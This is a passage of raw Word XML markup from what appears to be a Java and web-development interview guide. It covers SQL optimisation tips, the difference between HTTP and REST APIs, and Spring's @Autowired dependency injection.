          <v:rect id="_x0000_i2711" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F379FA"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8. Archive Old Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B361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ove old or rarely accessed data to an </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>archive table/database</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7650F8"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C5A6B">
          <v:rect id="_x0000_i2712" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CFA50"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9. Optimize SQL Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB75B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SELECT *, use projections, limit joins, and monitor slow queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29821AA2" w14:textId="6119BC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713" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C84726" w14:textId="125B2AC2" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004C2251">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="670" w:name="_Toc197867884"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between REST API and Http</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="670"/>
    </w:p>
    <w:p w14:paraId="31B253DF" w14:textId="37F7D895" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F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the difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST API</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TTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21486064"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61E7E">
          <v:rect id="_x0000_i2714" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A68FA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HTTP (HyperText Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1E3C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col</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for communication between client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBB7D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defines </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like GET, POST, PUT, DELETE, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F85A3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orks over </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, typically on port 80 (HTTP) or 443 (HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9E92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 request-response based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461D8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GET /users/1 HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>It’s just a request using HTTP protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CAF30D"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CC234">
          <v:rect id="_x0000_i2715" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB3188"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REST API (Representational State Transfer API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10081942"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ign style/pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building web services </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>over HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDAD3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s </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP methods</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to expose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 xml:space="preserve"> (like User, Order, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA6E8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turns </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON/XML</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195EBADC"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ST is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not a protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP as a transport</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62335BE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REST API endpoint: GET /api/users/1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67592F1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id": 1, "name": "John" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63706975"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33D72">
          <v:rect id="_x0000_i2716" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AA11E"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1368"/>
        <w:gridCol w:w="3463"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="17029C7B" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6353E02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CB135C"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TTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B26612"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T API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="43C8ED39" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A39C94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e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75EBF4F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ocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7821CD2B"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chitectural style</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="311E260C" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E416E4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rpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F2FCFE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transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68481A1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ing web services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="233398D2" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA662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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4621189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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB93BAF"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 + resource-based URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4D8E98F9" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D7A67A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Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE7A12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fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="701E181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ually JSON or XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3EF8B83A" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728F5C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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00EBD89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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E10E91"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r>
    </w:tbl>
    <w:p w14:paraId="66C06F7F"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894895">
          <v:rect id="_x0000_i2717" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8240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clusion</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">HTTP is the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>underlying protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, while REST is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>style of designing APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that use HTTP to perform operations on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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CCB63" w14:textId="28DAB01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718" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B58C84" w14:textId="5135F4A4" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004847BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="671" w:name="_Toc197867885"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain @Autowired usage</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="671"/>
    </w:p>
    <w:p w14:paraId="2FE02977" w14:textId="775D867F" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05"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Autowired in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A38C2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Autowired is used for </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring. It tells Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inject the required dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically from the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4395E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24400">
          <v:rect id="_x0000_i2719" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB4098"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Where can @Autowired be used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349FA7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constructors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A42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fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32734D5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setter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A786B"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78825">
          <v:rect id="_x0000_i2720" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9A5FB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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C579859"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eld Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C5B4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C6C7E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CEFAE39" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FBC19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23E5B2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5D3BC1D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87DA2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structor Injection (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC7DDF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49BD6A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98690DE" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A708A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final UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BB2D7" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7688DF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E8E7D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Service(UserRepository userRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31125A3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281B3A8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A246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76D2DCE"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tter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6283390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5F2F079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2A444F4E" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A336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256C04A9" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFB94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D6B633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UserRepository(UserRepository userRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCAA43A"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080B1E1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8E03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324A0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ECC9A">
          <v:rect id="_x0000_i2721" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E6BEB"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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F08D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By default, @Autowired injects </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>by type</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
